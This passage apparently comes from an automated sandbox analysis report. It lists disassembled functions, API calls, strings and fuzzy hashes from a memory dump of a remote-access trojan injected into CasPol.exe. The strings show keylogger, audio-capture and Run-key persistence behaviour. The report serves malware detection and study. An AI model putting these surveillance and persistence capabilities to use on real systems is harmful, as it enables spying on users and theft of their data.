                                                                                                                      • Instruction ID: 3b94612a358327762e597db0d4245ee78264fa841ead315e3e24d1cb8b3ec7b7
                                                                                                                      • Opcode Fuzzy Hash: cba3a97e1e2bda49592f8a8e1d6d35a5d6160c6c563f13c2ae5fe5c742252b28
                                                                                                                      • Instruction Fuzzy Hash: 3F01F5712082147FE6104F28AC89EBB739DEB96379F14063AF952C22C0D765CC8596BE
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 18f7b12d8fbd203e6fe2bd4c4423912ade4cd6e2ab417617722edd39325a2eb9
                                                                                                                      • Instruction ID: dab0b0a7df633c5b48e856b81aae527c8b914588f9bdc990e5f583acd93a84b2
                                                                                                                      • Opcode Fuzzy Hash: 18f7b12d8fbd203e6fe2bd4c4423912ade4cd6e2ab417617722edd39325a2eb9
                                                                                                                      • Instruction Fuzzy Hash: 5701F2F2A097163EF62116792CC0F6B670DDF413B9B31073BB921622E1EAE8CC42506C
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 8aedf970bdaeb9d9c72bc659829c2e19759f544123fe9e87a80c2ba2346fca48
                                                                                                                      • Instruction ID: 297bbf4b6e7cb62aad9c1df2c980cfc74e2a715ef03096c7e716b38b90e38ed5
                                                                                                                      • Opcode Fuzzy Hash: 8aedf970bdaeb9d9c72bc659829c2e19759f544123fe9e87a80c2ba2346fca48
                                                                                                                      • Instruction Fuzzy Hash: 5401D1F2A096167EB7201A7A7DC0D67624EDF823B9371033BF421612D5EAA88C408179
                                                                                                                      APIs
                                                                                                                      • ___BuildCatchObject.LIBVCRUNTIME ref: 0043811F
                                                                                                                        • Part of subcall function 0043806C: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 0043809B
                                                                                                                        • Part of subcall function 0043806C: ___AdjustPointer.LIBCMT ref: 004380B6
                                                                                                                      • _UnwindNestedFrames.LIBCMT ref: 00438134
                                                                                                                      • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00438145
                                                                                                                      • CallCatchBlock.LIBVCRUNTIME ref: 0043816D
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 737400349-0
                                                                                                                      • Opcode ID: c8370f5f766c88f9b882548d03e746073a9763e8d7037f7b78bb80a5d64990c6
                                                                                                                      • Instruction ID: b756294ed3ea81ca49fa364012696409ae819ba0eb544c37e892c8a1feda9a6f
                                                                                                                      • Opcode Fuzzy Hash: c8370f5f766c88f9b882548d03e746073a9763e8d7037f7b78bb80a5d64990c6
                                                                                                                      • Instruction Fuzzy Hash: D7012D72100208BBDF126E96CC45DEB7B69EF4C758F04501DFE4866121C73AE862DBA4
                                                                                                                      APIs
                                                                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,004471C7,?,00000000,00000000,00000000,?,004474F3,00000006,FlsSetValue), ref: 00447252
                                                                                                                      • GetLastError.KERNEL32(?,004471C7,?,00000000,00000000,00000000,?,004474F3,00000006,FlsSetValue,0045D328,FlsSetValue,00000000,00000364,?,00446FA1), ref: 0044725E
                                                                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,004471C7,?,00000000,00000000,00000000,?,004474F3,00000006,FlsSetValue,0045D328,FlsSetValue,00000000), ref: 0044726C
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: LibraryLoad$ErrorLast
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3177248105-0
                                                                                                                      • Opcode ID: ae052748fea16bfd64aed14cfe47709c8c773e0353203442da9e9610ebb1fa47
                                                                                                                      • Instruction ID: b3fe555fe56df17639c4036f58dc3a809bdc468a9df6621700516029eed46faf
                                                                                                                      • Opcode Fuzzy Hash: ae052748fea16bfd64aed14cfe47709c8c773e0353203442da9e9610ebb1fa47
                                                                                                                      • Instruction Fuzzy Hash: 0D01D432649323ABD7214B79BC44A5737D8BB05BA2B2506B1F906E3241D768D802CAE8
                                                                                                                      APIs
                                                                                                                      • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B643
                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000), ref: 0041B657
                                                                                                                      • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0041B67C
                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0041B68A
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: File$CloseCreateHandleReadSize
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3919263394-0
                                                                                                                      • Opcode ID: 84c524a448c010b9be172ba78faf3346c00c98969e38f24d930284b8d2add881
                                                                                                                      • Instruction ID: 3f34627ebf18732c46889562bde790f52735f321db32931f0b6625c87776b378
                                                                                                                      • Opcode Fuzzy Hash: 84c524a448c010b9be172ba78faf3346c00c98969e38f24d930284b8d2add881
                                                                                                                      • Instruction Fuzzy Hash: 81F0F6B12053047FE6101B21BC85FBF375CDB967A5F00027EFC01A22D1DA658C4591BA
                                                                                                                      APIs
                                                                                                                      • GetSystemMetrics.USER32(0000004C), ref: 00418529
                                                                                                                      • GetSystemMetrics.USER32(0000004D), ref: 0041852F
                                                                                                                      • GetSystemMetrics.USER32(0000004E), ref: 00418535
                                                                                                                      • GetSystemMetrics.USER32(0000004F), ref: 0041853B
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: MetricsSystem
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4116985748-0
                                                                                                                      • Opcode ID: a3bedc3d93ee6e0b45313aeec5082688588fe46082e633aeec829f05b9632c7f
                                                                                                                      • Instruction ID: f480d68fafb364c29fc67a5f666d93eee18e0abee54110dfc95006384cbaadd6
                                                                                                                      • Opcode Fuzzy Hash: a3bedc3d93ee6e0b45313aeec5082688588fe46082e633aeec829f05b9632c7f
                                                                                                                      • Instruction Fuzzy Hash: 72F0D672B043256BCA00EA7A4C4156FAB97DFC46A4F25083FE6059B341DE78EC4647D9
                                                                                                                      APIs
                                                                                                                      • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B3A5
                                                                                                                      • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3B8
                                                                                                                      • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041B3E3
                                                                                                                      • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041B3EB
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CloseHandleOpenProcess
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 39102293-0
                                                                                                                      • Opcode ID: 5115dc8d21cc8ae304c84a9c6d3d66be3b1fde84125eb931853a25931357237b
                                                                                                                      • Instruction ID: d8943217945b3e3bc9c1dbf33fc4ac7f726da2cd485b5cd5dbfa96192dfeb6c9
                                                                                                                      • Opcode Fuzzy Hash: 5115dc8d21cc8ae304c84a9c6d3d66be3b1fde84125eb931853a25931357237b
                                                                                                                      • Instruction Fuzzy Hash: 67F04971204209ABD3026794AC4AFEBB26CDF44B96F000037FA11D22A2FF74CCC146A9
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: _memcmp
                                                                                                                      • String ID: 4[G$4[G
                                                                                                                      • API String ID: 2931989736-4028565467
                                                                                                                      • Opcode ID: c0cf07660e95b0ee548887709ac0c844436c6f626d7fb978308fdfb467b77264
                                                                                                                      • Instruction ID: 33b36a833443cc607bae0a2c4f054eab59dd7b99d1d8389eb50a0704093c1055
                                                                                                                      • Opcode Fuzzy Hash: c0cf07660e95b0ee548887709ac0c844436c6f626d7fb978308fdfb467b77264
                                                                                                                      • Instruction Fuzzy Hash: E56110716047069AC714DF28D8406B3B7A8FF98304F44063EEC5D8F656E778AA25CBAD
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CountEventTick
                                                                                                                      • String ID: >G
                                                                                                                      • API String ID: 180926312-1296849874
                                                                                                                      • Opcode ID: f703b500cb05a13244301c0645b6086ff7a6bd2c3e191b326370292c0f426d94
                                                                                                                      • Instruction ID: 080f125417303e5552765b07387c73e695832f87024c8a27cfac38d5c25ddd71
                                                                                                                      • Opcode Fuzzy Hash: f703b500cb05a13244301c0645b6086ff7a6bd2c3e191b326370292c0f426d94
                                                                                                                      • Instruction Fuzzy Hash: 7E5191315042409AC224FB71D8A2AEF73E5AFD1314F40853FF94A671E2EF389949C69E
                                                                                                                      APIs
                                                                                                                      • GetCPInfo.KERNEL32(?,?,00000005,?,00000000), ref: 0044DB69
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Info
                                                                                                                      • String ID: $vD
                                                                                                                      • API String ID: 1807457897-3636070802
                                                                                                                      • Opcode ID: af305b060504fe74110eba1b75a066a7b29ec04ef294ab3684049637f65bd75b
                                                                                                                      • Instruction ID: 639e137743dbd1cdb094e6b6e994140176401b7572b89e22c1ac552797110b95
                                                                                                                      • Opcode Fuzzy Hash: af305b060504fe74110eba1b75a066a7b29ec04ef294ab3684049637f65bd75b
                                                                                                                      • Instruction Fuzzy Hash: 6A411C709043889AEF218F24CCC4AF6BBF9DF45308F1404EEE58A87242D279AA45DF65
                                                                                                                      APIs
                                                                                                                      • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,00450B49,?,00000050,?,?,?,?,?), ref: 004509C9
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: ACP$OCP
                                                                                                                      • API String ID: 0-711371036
                                                                                                                      • Opcode ID: c357b999de04d1742fe2857fcf8a245ff63c46433d95171d83c673f3fe2cd13c
                                                                                                                      • Instruction ID: 0ee4350655218b6c75cd3052c0190142cf4d5733969cac988e1a0851f3347a37
                                                                                                                      • Opcode Fuzzy Hash: c357b999de04d1742fe2857fcf8a245ff63c46433d95171d83c673f3fe2cd13c
                                                                                                                      • Instruction Fuzzy Hash: 832148EBA00100A6F7308F55C801B9773AAAB90B23F564426EC49D730BF73ADE08C358
                                                                                                                      APIs
                                                                                                                      • GetLocalTime.KERNEL32(?,00473EE8,004745A8,?,?,?,?,?,?,?,00414D7D,?,00000001,0000004C,00000000), ref: 004049F1
                                                                                                                        • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
                                                                                                                      • GetLocalTime.KERNEL32(?,00473EE8,004745A8,?,?,?,?,?,?,?,00414D7D,?,00000001,0000004C,00000000), ref: 00404A4E
                                                                                                                      Strings
                                                                                                                      • KeepAlive | Enabled | Timeout: , xrefs: 004049E5
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: LocalTime
                                                                                                                      • String ID: KeepAlive | Enabled | Timeout:
                                                                                                                      • API String ID: 481472006-1507639952
                                                                                                                      • Opcode ID: 55e8a268f478e9dd55dcba40bfbb0b748b5ff50574cd289cd160118e090ea358
                                                                                                                      • Instruction ID: 8fc2066b5dd234cef981570443e677007340a491061b3c72667858eadfbc0999
                                                                                                                      • Opcode Fuzzy Hash: 55e8a268f478e9dd55dcba40bfbb0b748b5ff50574cd289cd160118e090ea358
                                                                                                                      • Instruction Fuzzy Hash: EF2129A1A042806BC310FB6A980676B7B9457D1315F48417EF948532E2EB3C5999CB9F
                                                                                                                      APIs
                                                                                                                      • GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: LocalTime
                                                                                                                      • String ID: | $%02i:%02i:%02i:%03i
                                                                                                                      • API String ID: 481472006-2430845779
                                                                                                                      • Opcode ID: d3ffcd1d0ca88ff003ebf63de90cbb52a1477b8a5ce084a0fda1429b811f37a5
                                                                                                                      • Instruction ID: f196d4ed1927782274832919bda13c77b2b6189c6c06a517aeeeb96a95a688aa
                                                                                                                      • Opcode Fuzzy Hash: d3ffcd1d0ca88ff003ebf63de90cbb52a1477b8a5ce084a0fda1429b811f37a5
                                                                                                                      • Instruction Fuzzy Hash: 81114C725082045AC704EBA5D8568AF73E8EB94708F10053FFC85931E1EF38DA84C69E
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040A884
                                                                                                                        • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
                                                                                                                        • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
                                                                                                                      • CloseHandle.KERNEL32(?), ref: 0040A7CA
                                                                                                                      • UnhookWindowsHookEx.USER32 ref: 0040A7DD
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                                                                                                                      • String ID: Online Keylogger Stopped
                                                                                                                      • API String ID: 1623830855-1496645233
                                                                                                                      • Opcode ID: 441e50180230ba2ba05f386e367c5a536ce2e77025d1c3492b7828fca42d8fe8
                                                                                                                      • Instruction ID: 9ca866747e1af720c58b6b078daeda0145c7b5fd7bd766bf2ea1503866da158c
                                                                                                                      • Opcode Fuzzy Hash: 441e50180230ba2ba05f386e367c5a536ce2e77025d1c3492b7828fca42d8fe8
                                                                                                                      • Instruction Fuzzy Hash: 8101D431A043019BDB25BB35C80B7AEBBB19B45315F40407FE481275D2EB7999A6C3DB
                                                                                                                      APIs
                                                                                                                      • waveInPrepareHeader.WINMM(?,00000020,?,?,00000000,00475B90,00473EE8,?,00000000,00401913), ref: 00401747
                                                                                                                      • waveInAddBuffer.WINMM(?,00000020,?,00000000,00401913), ref: 0040175D
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: wave$BufferHeaderPrepare
                                                                                                                      • String ID: T=G
                                                                                                                      • API String ID: 2315374483-379896819
                                                                                                                      • Opcode ID: 8fbe103bd9222016c2b4e2bc3eb0eb996b4ad057f7b910ac6b5a0adda4e0e2aa
                                                                                                                      • Instruction ID: f8644d152c35c587af506687758c025c54344a6e575747702fe1289d7b8da532
                                                                                                                      • Opcode Fuzzy Hash: 8fbe103bd9222016c2b4e2bc3eb0eb996b4ad057f7b910ac6b5a0adda4e0e2aa
                                                                                                                      • Instruction Fuzzy Hash: 65018B71301300AFD7209F39EC45A69BBA9EB4931AF01413EB808D32B1EB34A8509B98
                                                                                                                      APIs
                                                                                                                      • IsValidLocale.KERNEL32(00000000,z=D,00000000,00000001,?,?,00443D7A,?,?,?,?,00000004), ref: 004477EC
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: LocaleValid
                                                                                                                      • String ID: IsValidLocaleName$z=D
                                                                                                                      • API String ID: 1901932003-2791046955
                                                                                                                      • Opcode ID: 34048a5779238571e042b1bd9c847fb843bb8be3ea41a6d98ed8d0d1ded4c140
                                                                                                                      • Instruction ID: b87742f2873dd73c0a7d5aade023b210d3410e3306d67f57874115e62e910f2b
                                                                                                                      • Opcode Fuzzy Hash: 34048a5779238571e042b1bd9c847fb843bb8be3ea41a6d98ed8d0d1ded4c140
                                                                                                                      • Instruction Fuzzy Hash: 72F0E930A45318F7DA106B659C06F5E7B54CF05711F50807BFD046A283CE796D0285DC
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: H_prolog
                                                                                                                      • String ID: T=G$T=G
                                                                                                                      • API String ID: 3519838083-3732185208
                                                                                                                      • Opcode ID: 138b4589fff14f79146b4c81e53a501c98e6cc4b2bf129928705b8782f8e57ab
                                                                                                                      • Instruction ID: f0e76400c825ed045590d0aed9209fb7c3a86c2d0af9b05bbbbea7315d156e8c
                                                                                                                      • Opcode Fuzzy Hash: 138b4589fff14f79146b4c81e53a501c98e6cc4b2bf129928705b8782f8e57ab
                                                                                                                      • Instruction Fuzzy Hash: 77F0E971A00221ABC714BB65C80569EB774EF4136DF10827FB416B72E1CBBD5D04D65D
                                                                                                                      APIs
                                                                                                                      • GetKeyState.USER32(00000011), ref: 0040AD5B
                                                                                                                        • Part of subcall function 00409B10: GetForegroundWindow.USER32 ref: 00409B3F
                                                                                                                        • Part of subcall function 00409B10: GetWindowThreadProcessId.USER32(00000000,?), ref: 00409B4B
                                                                                                                        • Part of subcall function 00409B10: GetKeyboardLayout.USER32(00000000), ref: 00409B52
                                                                                                                        • Part of subcall function 00409B10: GetKeyState.USER32(00000010), ref: 00409B5C
                                                                                                                        • Part of subcall function 00409B10: GetKeyboardState.USER32(?), ref: 00409B67
                                                                                                                        • Part of subcall function 00409B10: ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 00409B8A
                                                                                                                        • Part of subcall function 00409B10: ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 00409BE3
                                                                                                                        • Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,00000000,0040A91C,00000000), ref: 00409D84
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
                                                                                                                      • String ID: [AltL]$[AltR]
                                                                                                                      • API String ID: 2738857842-2658077756
                                                                                                                      • Opcode ID: 3060760f9439b7e306d49c13d8f75930fa0495ce116598ddfd2946cd15ffa226
                                                                                                                      • Instruction ID: d2c0c429c9fe13b3c6c970781ecfc4970ab7400740a1dec538c1fc9fef0a0b20
                                                                                                                      • Opcode Fuzzy Hash: 3060760f9439b7e306d49c13d8f75930fa0495ce116598ddfd2946cd15ffa226
                                                                                                                      • Instruction Fuzzy Hash: 47E0652134072117C898323EA91E6EE3A228F82B65B80416FF8866BAD6DD6D4D5053CB
                                                                                                                      APIs
                                                                                                                      • _free.LIBCMT ref: 00448835
                                                                                                                        • Part of subcall function 00446AD5: HeapFree.KERNEL32(00000000,00000000,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?), ref: 00446AEB
                                                                                                                        • Part of subcall function 00446AD5: GetLastError.KERNEL32(?,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?,?), ref: 00446AFD
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorFreeHeapLast_free
                                                                                                                      • String ID: `@$`@
                                                                                                                      • API String ID: 1353095263-20545824
                                                                                                                      • Opcode ID: 9a963da6b0d453c70d37714207bd95daf40472698ea915a46c6a843fe12f4396
                                                                                                                      • Instruction ID: fd413ccac38a9f67c3de8d393d9e933a11814297f80871467d1a397382efd299
                                                                                                                      • Opcode Fuzzy Hash: 9a963da6b0d453c70d37714207bd95daf40472698ea915a46c6a843fe12f4396
                                                                                                                      • Instruction Fuzzy Hash: 4DE06D371006059F8720DE6DD400A86B7E5EF95720720852AE89DE3710D731E812CB40
                                                                                                                      APIs
                                                                                                                      • GetKeyState.USER32(00000012), ref: 0040ADB5
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: State
                                                                                                                      • String ID: [CtrlL]$[CtrlR]
                                                                                                                      • API String ID: 1649606143-2446555240
                                                                                                                      • Opcode ID: 5e7418163892c1745ec9138d14110a374d5f1712bd724f4894496e05d56ee1c7
                                                                                                                      • Instruction ID: 615b7dbe40c0b8188db9493e0f2b19f017fb36a74fa458c508a435569d7d4a1e
                                                                                                                      • Opcode Fuzzy Hash: 5e7418163892c1745ec9138d14110a374d5f1712bd724f4894496e05d56ee1c7
                                                                                                                      • Instruction Fuzzy Hash: 71E0862170071117C514353DD61A67F39228F41776F80013FF882ABAC6E96D8D6023CB
                                                                                                                      APIs
                                                                                                                      • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,?,80000002,80000002,0040BFB2,00000000,004742E0,004742F8,?,pth_unenc), ref: 00412988
                                                                                                                      • RegDeleteValueW.ADVAPI32(?,?,?,pth_unenc), ref: 00412998
                                                                                                                      Strings
                                                                                                                      • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00412986
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: DeleteOpenValue
                                                                                                                      • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                                                                                                      • API String ID: 2654517830-1051519024
                                                                                                                      • Opcode ID: 37dabd9028f0cede140cc98497e4e15f557d68d096268be44a89a64eb946223e
                                                                                                                      • Instruction ID: 4813e9247c8a4fa7715124fbb4df20ddc3d96ddce1d5e270e7c0f337b45b5704
                                                                                                                      • Opcode Fuzzy Hash: 37dabd9028f0cede140cc98497e4e15f557d68d096268be44a89a64eb946223e
                                                                                                                      • Instruction Fuzzy Hash: 0AE01270310304BFEF104F61ED06FDB37ACBB80B89F004165F505E5191E2B5DD54A658
                                                                                                                      APIs
                                                                                                                      • DeleteFileW.KERNEL32(00000000,?,pth_unenc), ref: 0040AF84
                                                                                                                      • RemoveDirectoryW.KERNEL32(00000000,?,pth_unenc), ref: 0040AFAF
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: DeleteDirectoryFileRemove
                                                                                                                      • String ID: pth_unenc
                                                                                                                      • API String ID: 3325800564-4028850238
                                                                                                                      • Opcode ID: b9b9920c625181ca6de104178518fd5ce2cfe10458045dbf61cc06549d32ecb0
                                                                                                                      • Instruction ID: b68931c7331ddc333ece9e06749e281aefc344294653c9eba2f2de372e339d66
                                                                                                                      • Opcode Fuzzy Hash: b9b9920c625181ca6de104178518fd5ce2cfe10458045dbf61cc06549d32ecb0
                                                                                                                      • Instruction Fuzzy Hash: FEE046715112108BC610AB31EC44AEBB398AB05316F00487FF8D3A36A1DE38A988CA98
                                                                                                                      APIs
                                                                                                                      • TerminateProcess.KERNEL32(00000000,pth_unenc,0040E670), ref: 004116A9
                                                                                                                      • WaitForSingleObject.KERNEL32(000000FF), ref: 004116BC
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ObjectProcessSingleTerminateWait
                                                                                                                      • String ID: pth_unenc
                                                                                                                      • API String ID: 1872346434-4028850238
